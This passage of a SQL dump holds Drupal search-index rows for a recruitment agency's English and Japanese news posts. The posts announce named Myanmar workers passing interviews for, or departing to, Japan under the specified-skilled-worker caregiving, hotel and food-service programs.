(165, 'ja', 'node_search', '  特定技 定技能 介護 人材 4 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ   特定技 定技能 介護 人材 4 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ admin fri 6192026 1602 wed 6032026 956 2026 年 6 月 3 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 以下の 4 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 介護 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します thae su su aye さん hnin yu war さん hsu mon htet さん shwe sin win さん 今回の 回の出 の出発 出発は 日本で 本での での介 の介護 介護分 護分野 分野に 野にお におけ おける けるキ るキャ キャリ ャリア リアを アを目 を目指 目指し 長期間 期間に 間にわ にわた わたる たる準 る準備 準備と 備と努 と努力 努力を 力を重 を重ね 重ねて ねてき てきた きた成 た成果 成果と 果とな となり なりま ります 皆様の 様の新 の新た 新たな たな挑 な挑戦 挑戦を 戦を心 を心よ 心より よりお りお祝 お祝い 祝いす いする すると るとと ととも ともに 日本で 本での での生 の生活 生活と 活と仕 と仕事 仕事が 事が実 が実り 実り多 り多い 多いも いもの ものと のとな となる なるこ ること ことを とを願 を願っ 願って ってお ており おりま ります ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 今後も 後もミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材の 材の海 の海外 海外就 外就労 就労を 労を支 を支援 支援し 援して してま てまい まいり いりま ります  2026 年 6 月 3 日 4 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 介護 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(166, 'en', 'node_search', ' candidate successfully passed tokutei hotel interview candidate successfully passed tokutei hotel interview admin fri 6192026 1606 wed 5202026 907 interview success announcement new comet trading agency is delighted to announce that ms thu thu aung has successfully passed the interview for a specified skilled worker hotel position in japan her achievement reflects dedication perseverance and thorough preparation for a career in japan s hospitality industry we extend our heartfelt congratulations on this important accomplishment and wish her every success in the upcoming procedures and future career in japan we look forward to seeing her begin an exciting new chapter in the japanese hotel industry congratulations and best wishes for the future ms thu thu aung successfully passed the interview for a specified skilled worker hotel position in japan   ', 0),
(166, 'ja', 'node_search', '  特定技 定技能 宿泊 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 宿泊 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1608 wed 5202026 907  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは thu thu aung さんが んが特 が特定 特定技 定技能 宿泊 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の努 の努力 努力と 力と継 と継続 継続的 続的な 的な学 な学習 そして して日 て日本 日本の 本の宿 の宿泊 宿泊業 泊業界 業界で 界で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた熱 た熱意 熱意の 意の成 の成果 成果で 果です この素 の素晴 素晴ら 晴らし らしい しい成 い成果 成果を 果を心 を心よ 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します 日本で 本での での新 の新し 新しい しいキ いキャ キャリ ャリア リアが アが実 が実り 実り多 り多い 多いも いもの ものと のとな となる なるこ ること ことを とを願 を願っ 願って ってお ており おりま ります おめで めでと でとう とうご うござ ござい ざいま います  thu thu aung さんが んが特 が特定 特定技 定技能 宿泊 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(167, 'en', 'node_search', ' four food service workers departed for japan four food service workers departed for japan admin fri 6192026 1610 thu 4232026 912 departure to japan 23 april 2026 new comet trading agency is pleased to announce that the following candidates successfully departed for japan on 23 april 2026 under the specified skilled worker food service program phoo pwint kyaw ei zin htwe htay htay khaing mai tandar naing this achievement marks the beginning of an exciting new journey as they pursue career opportunities in japan s food service industry we wish all four candidates success in their new workplaces and hope they gain valuable experience while building a bright future in japan new comet trading agency remains committed to supporting myanmar workers in achieving their professional goals through overseas employment opportunities four candidates successfully departed for japan on 23 april 2026 under the specified skilled worker food service program  ', 0),
(167, 'ja', 'node_search', '  特定技 定技能 外食業 人材 4 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ   特定技 定技能 外食業 人材 4 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ admin fri 6192026 1612 thu 4232026 912 2026 年 4 月 23 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 以下の 4 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します phoo pwint kyaw さん ei zin htwe さん htay htay khaing さん mai tandar naing さん 皆様は 日本の 本の外 の外食 外食業 食業界 業界で 界で新 で新た 新たな たなキ なキャ キャリ ャリア リアを アをス をスタ スター タート ートさ トされ されま れます 新しい しい職 い職場 職場で 場で多 で多く 多くの くの経 の経験 経験を 験を積 を積み 充実し 実した した生 た生活 生活と 活と明 と明る 明るい るい未 い未来 未来を 来を築 を築か 築かれ かれる れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 今後も 後もミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材の 材の海 の海外 海外就 外就労 就労を 労を支 を支援 支援し 援して してま てまい まいり いりま ります 2026 年 4 月 23 日 4 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(168, 'en', 'node_search', ' candidate successfully passed tokutei hotel interview candidate successfully passed tokutei hotel interview admin fri 6192026 1614 wed 5202026 915 interview success in the hospitality sector new comet trading agency is pleased to announce that ms win htet htet aung has successfully passed the interview for a specified skilled worker hotel position in japan this achievement demonstrates her commitment preparation and determination to pursue a professional career in japan s hospitality industry we extend our sincere congratulations and wish her continued success throughout the upcoming procedures and her future career in japan may this accomplishment serve as the beginning of a rewarding and successful journey in the japanese hotel sector ms win htet htet aung successfully passed the interview for a specified skilled worker hotel position in japan  ', 0),
(168, 'ja', 'node_search', '  特定技 定技能 宿泊 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 宿泊 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1617 wed 5202026 915  宿泊分 泊分野 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは win htet htet aung さんが んが特 が特定 特定技 定技能 宿泊 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の努 の努力 努力と 力と熱 と熱心 熱心な 心な準 な準備 準備の 備の成 の成果 成果で 果であ であり 日本の 本の宿 の宿泊 宿泊業 泊業界 業界で 界で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた大 た大き 大きな きな前 な前進 前進と 進とな となり なりま りまし ました 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します この素 の素晴 素晴ら 晴らし らしい しい成 い成果 成果が 日本で 本での での充 の充実 充実し 実した したキ たキャ キャリ ャリア リアの アの第 の第一 第一歩 一歩と 歩とな となる なるこ ること ことを とを願 を願っ 願って ってお ており おりま ります おめで めでと でとう とうご うござ ござい ざいま います win htet htet aung さんが んが特 が特定 特定技 定技能 宿泊 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(169, 'en', 'node_search', ' three caregiver workers departed for japan three caregiver workers departed for japan admin fri 6192026 1620 sun 5102026 921 embarking on a new journey in japan new comet trading agency is proud to announce that the following candidates successfully departed for japan on 10 may 2026 under the specified skilled worker kaigo program thandar moe thet mon soe mi mi kyaw after completing their preparations and training they have taken an important step toward building their careers in japan s caregiving sector we wish them success in their new workplaces and hope they enjoy a rewarding experience while contributing their skills and dedication to the communities they serve may this new chapter bring personal growth professional achievement and a bright future ahead  three candidates successfully departed for japan on 10 may 2026 under the specified skilled worker kaigo program ', 0),
(169, 'ja', 'node_search', '  特定技 定技能 介護 人材 3 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ   特定技 定技能 介護 人材 3 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ admin fri 6192026 1623 sun 5102026 921  日本で 本での での新 の新た 新たな たな挑 な挑戦 挑戦へ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 以下の 3 名の候 の候補 候補者 補者が 2026 年 5 月 10 日に特 に特定 特定技 定技能 介護 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します thandar moe さん thet mon soe さん mi mi kyaw さん 皆様は 様は研 は研修 研修と 修と準 と準備 準備を 備を終 を終え 日本の 本の介 の介護 介護分 護分野 分野で 野で新 で新た 新たな たなキ なキャ キャリ ャリア リアを アをス をスタ スター タート ートさ トされ されま れます 新しい しい環 い環境 環境の 境の中 の中で 中で多 で多く 多くの くの経 の経験 経験を 験を積 を積み 成長と 長と成 と成功 成功を 功を重 を重ね 重ねら ねられ られる れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります 今後の 後のご のご活 ご活躍 活躍と 躍と充 と充実 充実し 実した した日 た日本 日本で 本での での生 の生活 生活を 活をお をお祈 お祈り 祈り申 り申し 申し上 し上げ 上げま げます  2026 年 5 月 10 日 3 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 介護 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(170, 'en', 'node_search', ' candidate successfully passed tokutei kaigo interview candidate successfully passed tokutei kaigo interview admin fri 6192026 1626 sat 5022026 943 a remarkable achievement in the caregiving sector new comet trading agency is pleased to announce that ms aye aye myint has successfully passed the interview for a specified skilled worker kaigo position in japan her success reflects determination hard work and a strong commitment to pursuing a professional career in japan s caregiving industry we extend our heartfelt congratulations on this achievement and wish her every success in the upcoming procedures and future employment in japan may this accomplishment serve as a stepping stone toward a rewarding and meaningful career dedicated to supporting others through caregiving services congratulations on this wonderful achievement ms aye aye myint successfully passed the interview for a specified skilled worker kaigo position in japan ', 0);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(170, 'ja', 'node_search', '  特定技 定技能 介護 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 介護 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1645 sat 5022026 943  介護分 護分野 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは aye aye myint さんが んが特 が特定 特定技 定技能 介護 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の努 の努力 努力と 力と熱 と熱心 熱心な 心な準 な準備 準備の 備の成 の成果 成果で 果であ であり 日本の 本の介 の介護 介護分 護分野 分野で 野で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた大 た大き 大きな きな前 な前進 前進と 進とな となり なりま りまし ました 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します この素 の素晴 素晴ら 晴らし らしい しい成 い成果 成果が 介護の 護の専 の専門 専門人 門人材 人材と 材とし として しての ての充 の充実 充実し 実した したキ たキャ キャリ ャリア リアの アの第 の第一 第一歩 一歩と 歩とな となる なるこ ること ことを とを願 を願っ 願って ってお ており おりま ります おめで めでと でとう とうご うござ ござい ざいま います  aye aye myint さんが んが特 が特定 特定技 定技能 介護 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(171, 'en', 'node_search', ' caregiver begins new career journey in japan caregiver begins new career journey in japan admin fri 6192026 1648 sun 4262026 948 departure to japan 26 april 2026 new comet trading agency is pleased to announce that ms may phyoe thu successfully departed for japan on 26 april 2026 under the specified skilled worker kaigo program this marks an important milestone in her journey toward building a professional career in japan s caregiving sector through dedication preparation and determination she has taken a significant step toward achieving her career goals we extend our heartfelt congratulations and wish her success happiness and personal growth as she begins this new chapter in japan may her experience be rewarding and inspiring both professionally and personally  ms may phyoe thu successfully departed for japan on 26 april 2026 under the specified skilled worker kaigo program ', 0),
(171, 'ja', 'node_search', '  特定技 定技能 介護 人材 日本出 本出発 出発の 発のお のお知 お知ら 知らせ   特定技 定技能 介護 人材 日本出 本出発 出発の 発のお のお知 お知ら 知らせ admin fri 6192026 1657 sun 4262026 948 2026 年 4 月 26 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは may phyoe thu さんが んが特 が特定 特定技 定技能 介護 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します 日本の 本の介 の介護 介護分 護分野 分野で 野で新 で新た 新たな たなキ なキャ キャリ ャリア リアを アをス をスタ スター タート ートさ トされ される れるこ ること ことと ととな となり ご本人 本人に 人にと にとっ とって って大 て大き 大きな きな節 な節目 節目と 目とな となる なる素 る素晴 素晴ら 晴らし らしい しい機 い機会 機会で 会です これま れまで までの での努 の努力 努力が 力が実 が実を 実を結 を結び 日本で 本での での新 の新し 新しい しい生 い生活 生活と 活と仕 と仕事 仕事が 事が充 が充実 充実し 実した したも たもの ものと のとな となる なるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります 今後の 後のご のご活 ご活躍 活躍と 躍とさ とさら さらな らなる なる成 る成長 成長を 長をお をお祈 お祈り 祈り申 り申し 申し上 し上げ 上げま げます  may phyoe thu さんが 2026 年 4 月 26 日に特 に特定 特定技 定技能 介護 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(173, 'en', 'node_search', ' nine food service workers begin their new careers in japan nine food service workers begin their new careers in japan admin fri 6192026 1708 wed 4222026 911 departure to japan 22 april 2026 new comet trading agency is delighted to announce that the following candidates successfully departed for japan on 22 april 2026 under the specified skilled worker food service program ei ei khet toe toe hlaing thri shin thant hnin wa than su myat thu myat phoo thaw myat noe khin hsu wyne wyne pyae khit yu ya soe after completing their language studies skills training and interview preparations these candidates have taken an important step toward building successful careers in japan we wish them all the best as they begin this exciting journey and embrace new opportunities in japan s food service industry may their hard work and determination lead them to a bright and successful future new comet trading agency is proud to support myanmar workers in achieving their international career goals  nine candidates departed for japan on 22 april 2026 under the specified skilled worker food service program ', 0),
(173, 'ja', 'node_search', '  特定技 定技能 外食業 人材 9 名 新たな たなキ なキャ キャリ ャリア リアへ アへの への出 の出発   特定技 定技能 外食業 人材 9 名 新たな たなキ なキャ キャリ ャリア リアへ アへの への出 の出発 admin fri 6192026 1712 wed 4222026 911 2026 年 4 月 22 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 以下の 9 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します ei ei khet さん toe toe hlaing さん thri shin thant さん hnin wa than さん su myat thu さん myat phoo thaw さん myat noe khin さん hsu wyne wyne pyae さん khit yu ya soe さん 皆様は 様は日 は日本 日本語 本語学 語学習 学習や 習や面 や面接 面接準 接準備 準備を 備を経 を経て 日本の 本の外 の外食 外食業 食業界 業界で 界で新 で新た 新たな たなキ なキャ キャリ ャリア リアを アをス をスタ スター タート ートさ トされ されま れます 日本で 本で多 で多く 多くの くの経 の経験 経験を 験を積 を積み それぞ れぞれ ぞれの れの目 の目標 目標に 標に向 に向か 向かっ かって って成 て成長 成長さ 長され される れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは これか れから からも らもミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材の 材の日 の日本 日本就 本就職 就職を 職を支 を支援 支援し 援して してま てまい まいり いりま ります  2026 年 4 月 22 日 9 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(174, 'en', 'node_search', ' a new opportunity begins in japan s food service industry a new opportunity begins in japan s food service industry admin fri 6192026 1714 wed 4012026 915 departure to japan 1 april 2026 new comet trading agency is pleased to announce that ms shwe zin phyo successfully departed for japan on 1 april 2026 under the specified skilled worker food service program after dedicated preparation and training she has taken an important step toward building a successful career in japan s food service industry this departure marks the beginning of a new chapter filled with opportunities for professional development cultural exchange and personal growth we sincerely congratulate her on this achievement and wish her success and happiness as she starts her new life and career in japan new comet trading agency will continue supporting myanmar workers in achieving their dreams of working abroad and building a brighter future ms shwe zin phyo successfully departed for japan on 1 april 2026 under the specified skilled worker food service program  ', 0),
(174, 'ja', 'node_search', '  特定技 定技能 外食業 人材 日本で 本での での新 の新た 新たな たなス なスタ スター タート   特定技 定技能 外食業 人材 日本で 本での での新 の新た 新たな たなス なスタ スター タート admin fri 6192026 1718 wed 4012026 915 2026 年 4 月 1 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは shwe zin phyo さんが んが特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します これま れまで までの での努 の努力 努力と 力と準 と準備 準備を 備を経 を経て 日本の 本の外 の外食 外食業 食業界 業界で 界で新 で新た 新たな たなキ なキャ キャリ ャリア リアを アをス をスタ スター タート ートさ トされ されま れます 今回の 回の出 の出発 出発は ご本人 本人に 人にと にとっ とって って大 て大き 大きな きな成 な成長 成長と 長と挑 と挑戦 挑戦の 戦の機 の機会 機会で 会であ であり 新しい しい未 い未来 未来へ 来への への第 の第一 第一歩 一歩と 歩とな となり なりま ります 日本で 本での での生 の生活 生活と 活と仕 と仕事 仕事が 事が充 が充実 充実し 実した したも たもの ものと のとな となり 多くの くの成 の成功 成功と 功と素 と素晴 素晴ら 晴らし らしい しい経 い経験 経験に 験に恵 に恵ま 恵まれ まれる れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 今後も 後もミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材の 材の日 の日本 日本就 本就職 就職を 職を支 を支援 支援し 援して してま てまい まいり いりま ります shwe zin phyo さんが 2026 年 4 月 1 日に特 に特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(175, 'en', 'node_search', ' starting a new journey in japan s food service industry starting a new journey in japan s food service industry admin fri 6192026 1720 sun 3292026 920 departure to japan 29 march 2026 new comet trading agency is delighted to announce that ms win win thu successfully departed for japan on 29 march 2026 under the specified skilled worker food service program her departure represents the beginning of an exciting new chapter as she pursues career opportunities in japan s food service industry through hard work determination and careful preparation she has taken an important step toward achieving her professional goals abroad we wish her continued success happiness and valuable experiences as she begins her new life and career in japan new comet trading agency remains committed to supporting myanmar workers in building successful international careers ms win win thu successfully departed for japan on 29 march 2026 under the specified skilled worker food service program  ', 0),
(175, 'ja', 'node_search', '  特定技 定技能 外食業 人材 日本で 本での での新 の新た 新たな たな挑 な挑戦   特定技 定技能 外食業 人材 日本で 本での での新 の新た 新たな たな挑 な挑戦 admin fri 6192026 1724 sun 3292026 920 2026 年 3 月 29 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは win win thu さんが んが特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します 日本の 本の外 の外食 外食業 食業界 業界で 界で新 で新た 新たな たなキ なキャ キャリ ャリア リアを アを築 を築く 築くた くため 大きな きな一 な一歩 一歩を 歩を踏 を踏み 踏み出 み出さ 出され されま れまし ました これま れまで までの での努 の努力 努力と 力と準 と準備 準備が 備が実 が実を 実を結 を結び 日本で 本での での新 の新し 新しい しい生 い生活 生活と 活と仕 と仕事 仕事が 事が始 が始ま 始まり まりま ります 今後 多くの くの経 の経験 経験を 験を積 を積み 積みな みなが ながら がら成 ら成長 成長さ 長され 充実し 実した した毎 た毎日 毎日を 日を送 を送ら 送られ られる れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは これか れから からも らもミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材の 材の日 の日本 日本就 本就職 就職を 職を支 を支援 支援し 援して してま てまい まいり いりま ります win win thu さんが 2026 年 3 月 29 日に特 に特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(176, 'en', 'node_search', ' two food service workers set off for japan two food service workers set off for japan admin fri 6192026 1729 thu 3052026 929 departure to japan 5 march 2026 new comet trading agency is pleased to announce that two candidates successfully departed for japan on 5 march 2026 under the specified skilled worker food service program the candidates are aye pyae pyae lwin sabi oo their departure marks the beginning of an exciting journey as they pursue new opportunities in japan s food service industry through dedication training and preparation they have achieved an important milestone toward their professional goals we are confident that they will continue to grow gain valuable experience and contribute positively to their workplaces in japan we wish both candidates success happiness and a rewarding future as they begin this new chapter of their lives two candidates successfully departed for japan on 5 march 2026 under the specified skilled worker food service program  ', 0),
(176, 'ja', 'node_search', '  特定技 定技能 外食業 人材 2 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ   特定技 定技能 外食業 人材 2 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ admin fri 6192026 1738 thu 3052026 929 2026 年 3 月 5 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 以下の 2 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します aye pyae pyae lwin さん sabai oo さん お二人 二人は 日本の 本の外 の外食 外食業 食業界 業界で 界で新 で新た 新たな たなキ なキャ キャリ ャリア リアを アをス をスタ スター タート ートさ トされ されま れます これま れまで までの での学 の学習 学習や 習や準 や準備 準備の 備の成 の成果 成果を 果を活 を活か 活かし 日本で 本で多 で多く 多くの くの経 の経験 経験を 験を積 を積み 積みな みなが ながら がら成 ら成長 成長さ 長され される れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります お二人 二人の 人の今 の今後 今後の 後のご のご活 ご活躍 活躍と 躍と充 と充実 充実し 実した した日 た日本 日本で 本での での生 の生活 生活を 活をお をお祈 お祈り 祈り申 り申し 申し上 し上げ 上げま げます ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは これか れから からも らもミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材の 材の日 の日本 日本就 本就職 就職を 職を支 を支援 支援し 援して してま てまい まいり いりま ります 2026 年 3 月 5 日 2 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(177, 'en', 'node_search', ' food service worker begins a new chapter in japan food service worker begins a new chapter in japan admin fri 6192026 1740 thu 2122026 941 departure to japan 12 february 2026 new comet trading agency is pleased to announce that ms tun eaindra moe successfully departed for japan on 12 february 2026 under the specified skilled worker food service program this achievement marks the beginning of a new chapter in her professional journey as she starts her career in japan s food service industry through determination preparation and hard work she has taken an important step toward achieving her goals and building a brighter future we extend our sincere congratulations and wish her success happiness and many valuable experiences in japan may her new journey be filled with growth opportunities and memorable achievements ms tun eaindra moe successfully departed for japan on 12 february 2026 under the specified skilled worker food service program  ', 0),
(177, 'ja', 'node_search', '  特定技 定技能 外食業 人材 日本で 本での での新 の新た 新たな たな一 な一歩   特定技 定技能 外食業 人材 日本で 本での での新 の新た 新たな たな一 な一歩 admin fri 6192026 1742 thu 2122026 941 2026 年 2 月 12 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは tun eaindra moe さんが んが特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します 日本の 本の外 の外食 外食業 食業界 業界で 界で新 で新た 新たな たなキ なキャ キャリ ャリア リアを アをス をスタ スター タート ートさ トされ される れるこ ること ことと ととな となり ご本人 本人に 人にと にとっ とって って大 て大き 大きな きな節 な節目 節目と 目とな となる なる素 る素晴 素晴ら 晴らし らしい しい機 い機会 機会で 会です これま れまで までの での努 の努力 努力と 力と準 と準備 準備が 備が実 が実を 実を結 を結び 日本で 本での での新 の新し 新しい しい生 い生活 生活と 活と仕 と仕事 仕事へ 事への への第 の第一 第一歩 一歩を 歩を踏 を踏み 踏み出 み出さ 出され されま れまし ました 今後 多くの くの経 の経験 経験を 験を積 を積み 積みな みなが ながら がら成 ら成長 成長さ 長され 充実し 実した した毎 た毎日 毎日を 日を送 を送ら 送られ られる れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります お仕事 仕事と 事と生 と生活 生活の 活の両 の両面 両面で 面でご でご活 ご活躍 活躍さ 躍され される れるこ ること ことを とをお をお祈 お祈り 祈り申 り申し 申し上 し上げ 上げま げます tun eaindra moe さんが 2026 年 2 月 12 日に特 に特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(178, 'en', 'node_search', ' a successful step toward a caregiving career in japan a successful step toward a caregiving career in japan admin fri 6192026 1752 sat 5022026 953 interview success announcement new comet trading agency is delighted to announce that ms phyo thiri htet has successfully passed the interview for a specified skilled worker kaigo position in japan passing the interview represents an important milestone in her journey toward a professional caregiving career in japan her dedication preparation and determination have contributed greatly to this achievement as she moves forward to the next stages of the employment process we wish her continued success and confidence in achieving her goals we look forward to seeing her begin a meaningful career in japan s caregiving sector and make a positive impact through her work ms phyo thiri htet successfully passed the interview for a specified skilled worker kaigo position in japan  ', 0),
